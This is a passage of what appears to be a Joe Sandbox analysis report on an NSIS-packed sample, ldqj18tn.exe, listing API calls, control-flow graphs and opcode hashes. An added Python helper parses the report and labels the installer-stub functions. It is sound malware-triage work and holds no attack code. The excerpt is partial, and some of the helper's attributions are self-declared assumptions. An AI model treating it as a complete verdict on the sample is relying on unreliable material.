                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                          • String ID:
                                                          • API String ID: 3376005127-0
                                                          • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                          • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                          • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                          • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

                                                          Control-flow Graph
                                                          • Basic blocks: 782 402b23-402b37 (GlobalAlloc); 783 402b39-402b49 (call 401446); 784 402b4b-402b6a (call 40145c, WideCharToMultiByte, lstrlenA); 789 402b70-402b73; 790 402b93; 791 402b75-402b8d (call 405f6a, WriteFile); 792 4030e3-4030f2; 796 402384-40238d (GlobalFree)
                                                          • Edges: 782->783, 782->784, 783->789, 784->789, 789->790, 789->791, 790->792, 791->790, 791->796, 796->792
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                          • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                          • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                          • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                          • String ID:
                                                          • API String ID: 2568930968-0
                                                          • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                          • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                          • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                          • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

                                                          Control-flow Graph
                                                          • Basic blocks: 799 402713-40273b (call 406009 * 2); 804 402746-402749; 805 40273d-402743 (call 40145c); 807 402755-402758; 808 40274b-402752 (call 40145c); 809 402764-40278c (call 40145c, call 4062a3, WritePrivateProfileStringW); 810 40275a-402761 (call 40145c)
                                                          • Edges: 799->804, 799->805, 804->807, 804->808, 805->804, 807->809, 807->810, 808->807, 810->809
                                                          APIs
                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileStringWritelstrcpyn
                                                          • String ID: %SenateRoof%$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                                          • API String ID: 247603264-2402012953
                                                          • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                          • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                          • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                          • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

                                                          Control-flow Graph
                                                          • Basic blocks: 906 4021b5-40220b (call 40145c * 4, call 404f72, ShellExecuteW); 917 402223-4030f2 (call 4062a3); 918 40220d-40221b (call 4062a3)
                                                          • Edges: 906->917, 906->918, 918->917
                                                          APIs
                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                          • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                          Strings
                                                          • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                          • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                          • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                          • API String ID: 3156913733-2180253247
                                                          • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                          • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                          • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                          • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405E9D
                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: nsa
                                                          • API String ID: 1716503409-2209301699
                                                          • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                          • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                          • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                          • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                          APIs
                                                          • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                          • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: Window$EnableShowlstrlenwvsprintf
                                                          • String ID: HideWindow
                                                          • API String ID: 1249568736-780306582
                                                          • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                          • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                          • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                          • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
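The function entries above (GetFileVersionInfoSizeW/GetFileVersionInfoW/VerQueryValueW, WideCharToMultiByte/WriteFile, WritePrivateProfileStringW, ShellExecuteW, GetTickCount/GetTempFileNameW with the "nsa" prefix, ShowWindow/EnableWindow) are the Win32 call patterns of individual NSIS installer-stub instruction handlers, which is what the "NSIS Error", "WriteINIStr:", "ExecShell:", "RMDir:" and "HideWindow" strings in this report already indicate. The following Python is an added triage helper, not part of the Joe Sandbox report and not Joe Sandbox or NSIS code: it parses the "APIs" and "String ID" lines of a function entry, separates direct calls from "Part of subcall function" entries, and names the NSIS instruction whose direct-call subsequence the function matches. The input is constructed from this report's own lines. The WriteINIStr, ExecShell and HideWindow names come from the stub's log strings shown above; attributing the GetFileVersionInfo* sequence to GetDLLVersion and the WideCharToMultiByte-then-WriteFile pair to FileWrite is this example's assumption based on NSIS's exec.c, and "nsa" is the prefix NSIS passes to GetTempFileNameW for its temporary files (nsaXXXX.tmp).

```python
"""Joe Sandbox function-entry triage: map a function's direct Win32 call
sequence to the NSIS stub instruction it implements (added example)."""
import re
from typing import Dict, List, Optional

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<call>.+?),?\s+ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
CALL = re.compile(r"^(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?$")
STRING_LINE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*)$")

# Direct-call subsequences that identify an NSIS stub instruction handler.
# WriteINIStr, ExecShell and HideWindow are named by the stub's own log strings
# in this report; GetDLLVersion and FileWrite are this example's attribution
# from NSIS exec.c (assumption: check against the NSIS source you care about).
NSIS_PATTERNS = [
    ("GetDLLVersion", ["GetFileVersionInfoSizeW", "GetFileVersionInfoW", "VerQueryValueW"]),
    ("FileWrite", ["WideCharToMultiByte", "WriteFile"]),
    ("WriteINIStr", ["WritePrivateProfileStringW"]),
    ("ExecShell", ["ShellExecuteW"]),
    ("HideWindow", ["ShowWindow", "EnableWindow"]),
]
NSIS_TEMP_PREFIX = "nsa"  # GetTempFileNameW prefix -> %TEMP%\nsaXXXX.tmp

# Constructed input: lines copied from this report's entries for ldqj18tn.exe.
REPORT_CHUNKS = {
    "4022fd": """\
• GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
• GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
• GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
• VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
• GlobalFree.KERNELBASE(0067E910), ref: 00402387
• String ID:
""",
    "402b23": """\
• GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
• WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
• lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
• WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
""",
    "4021b5": """\
  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
• ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
• String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
""",
    "405e9d": """\
• GetTickCount.KERNEL32 ref: 00405E9D
• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
• String ID: nsa
""",
}


def parse_api_line(line: str) -> Optional[Dict[str, object]]:
    """One '• Api.MODULE(args), ref: ADDR' line -> record, or None if not an API line."""
    m = API_LINE.match(line)
    c = CALL.match(m.group("call")) if m else None
    if not c:
        return None
    args = c.group("args") or ""
    return {"api": c.group("api"), "module": c.group("module"),
            "args": args.split(",") if args else [], "ref": int(m.group("ref"), 16),
            "subcall": int(m.group("sub"), 16) if m.group("sub") else None}


def is_subsequence(needle: List[str], hay: List[str]) -> bool:
    """True if every name in needle occurs in hay in that order (gaps allowed)."""
    it = iter(hay)
    return all(any(x == h for h in it) for x in needle)


def classify_function(chunk: str) -> Dict[str, object]:
    """Split an entry into direct calls, subcall targets and strings, then name
    the NSIS instruction(s) whose call pattern the direct calls match."""
    direct, subcalls, strings = [], set(), []
    for line in chunk.splitlines():
        rec = parse_api_line(line)
        if rec is None:
            s = STRING_LINE.match(line)
            if s and s.group("ids").strip():
                strings.extend(s.group("ids").split("$"))
        elif rec["subcall"] is None:
            direct.append(rec["api"])
        else:
            subcalls.add(rec["subcall"])
    hits = [name for name, seq in NSIS_PATTERNS if is_subsequence(seq, direct)]
    if "GetTempFileNameW" in direct and NSIS_TEMP_PREFIX in strings:
        hits.append("TempFile(" + NSIS_TEMP_PREFIX + ")")
    return {"direct": direct, "subcalls": sorted(subcalls), "strings": strings, "nsis": hits}


if __name__ == "__main__":
    for start, chunk in REPORT_CHUNKS.items():
        r = classify_function(chunk)
        print(f"sub_{start}: {' -> '.join(r['direct'])}  =>  {r['nsis']}")
```

Matching on direct calls only matters: the wsprintfW, lstrlenW and SetWindowTextW lines are reached through shared helpers (00405F51, 004062A3, 00404F72) that many handlers call, so counting them would make unrelated functions look alike. The same split applies when reading the Similarity "API ID" field, which folds subcall APIs into one string.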
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                          • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                          • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                          • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                          • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                          • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                          • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                          • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                          • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                          • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                          • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                          • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                          • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                          APIs
                                                          • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                          • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                          Similarity
                                                          • API ID: Global$AllocFree
                                                          • String ID:
                                                          • API String ID: 3394109436-0
                                                          APIs
                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          APIs
                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          APIs
                                                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                          • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                          Similarity
                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                          • String ID:
                                                          • API String ID: 4115351271-0
                                                          APIs
                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          APIs
                                                          • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                          • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                          • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                          • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08
                                                          APIs
                                                          • CloseHandle.KERNELBASE(FFFFFFFF,00403AD1,?), ref: 00403864
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: a114d1ad3d6f72424773905f6d3d8555ffb504a96b4f495319bf21f79649ad7b
                                                          • Instruction ID: b9bdbc8744521ee651ba7bc90111acac5a2c88e2b86e9c74d328a3688b9dc09a
                                                          • Opcode Fuzzy Hash: a114d1ad3d6f72424773905f6d3d8555ffb504a96b4f495319bf21f79649ad7b
